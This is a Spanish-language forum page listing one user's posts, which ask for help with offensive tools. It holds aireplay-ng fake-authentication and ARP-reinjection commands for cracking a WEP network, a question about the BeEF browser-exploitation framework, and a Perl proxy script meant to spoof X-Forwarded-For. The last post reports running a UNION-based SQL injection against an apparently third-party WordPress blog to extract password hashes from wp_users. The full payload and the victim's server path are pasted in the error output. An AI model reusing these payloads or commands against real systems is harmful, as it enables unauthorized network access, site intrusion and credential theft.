Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - aninhill

#1
Hacking Wireless / Problema aireplay-ng
2 Octubre 2010, 06:46 AM
Hola,

Lo que hago:
Me pongo a capturar paquetes con airodump-ng.
Hago un fake client: aireplay-ng -1 10 -e "nombreAP" -a "macAP" -h mac-de-mi-placa-de-red-fake interfaz. Consigo autenticarme satisfactoriamente.
Intento una reinyeccion de arp: aireplay-ng -3 -b "macAP" -h mac-de-mi-placa-de-red-fake PERO no consiguo arp requests entonces no suben los IV's.

No se que hago mal. De todas maneras, otra forma de acelerar la captura de IV's es bienvenida.

Gracias
#2
Hola,
Estuve mirando esta herramienta(BeEF) bastante interesante por cierto. Lo que hace es explotar vulns en los browsers.
Hasta ahi capto la idea, pero no entiendo como utilizar esta herramienta. He intentado usarla localmente, pero esta muy limitada porque tiene que estar puesta justo en el dominio principal de un servidor.

Alguien ya la ha probado?

Gracias
#3
Scripting / Se puede hacer esto? Perl
13 Diciembre 2008, 19:58 PM
Hola,
Queria saber si se puede hacer una cosa parecida a un proxy, nada mas que funcione de forma local y agrege algunos headers para hacer los request como otro ip.
En este caso el header que supongo serviria es el X-Forwarded-For. En fin, se puede hacer dicho script?

Aqui hay una idea nomas, pero no funciona, creo.

#!/usr/bin/perl -w
use HTTP::Proxy qw( :log );
use HTTP::Proxy::HeaderFilter::simple;
use strict;

# a simple IpSpoofing filter
my $filter = HTTP::Proxy::HeaderFilter::simple->new(
#?
sub { $_[0]->header( 'X-Forwarded-For' => '192.168.102.32' );}
);

# a simple ip generator
#$ip1= int(rand(30))+190;
#$ip2= int(rand(240));
#$ip3= int(rand(240));
#$ip4= int(rand(240));
#$ip = $ip1.".".$ip2.".".$ip3.".".$ip4;
   
# initialisation
my $proxy = HTTP::Proxy->new( port => 3128 );
$proxy->port( 3128 );
# this is a MainLoop-like method
$proxy->x_forwarded_for();
$proxy->push_filter(
    mime    => undef,
    request => HTTP::Proxy::HeaderFilter::simple->new(
        sub { $_[1]->remove_header(qw( User-Agent From Referer Cookie Cookie2 )) }
    ),
    response => HTTP::Proxy::HeaderFilter::simple->new(
        sub { $_[1]->remove_header(qw( Set-Cookie Set-Cookie2 )) }
    )
);
$proxy->via('');
$proxy->start;
$proxy->init();
print "Proxy started on port 3128 \n\n\n";
$proxy->push_filter(request => $filter);
print "Filtering??? \n\n\n";
#4
Si, tambien lo he probado. Lo usan bastante con metasploit. En el foro de backtrack cada vez lo veo mas.
#5
Lo probe en un blog de wordpress. No se que version es pero me responde esto:



WordPress database error: [Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND (((post_title LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#') OR (post_content LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#'))) AND post_type = 'post' AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10

Warning: Cannot modify header information - headers already sent by (output started at /home/jamiecar/public_html/wp-includes/wp-db.php:160) in /home/jamiecar/public_html/wp-includes/pluggable.php on line 391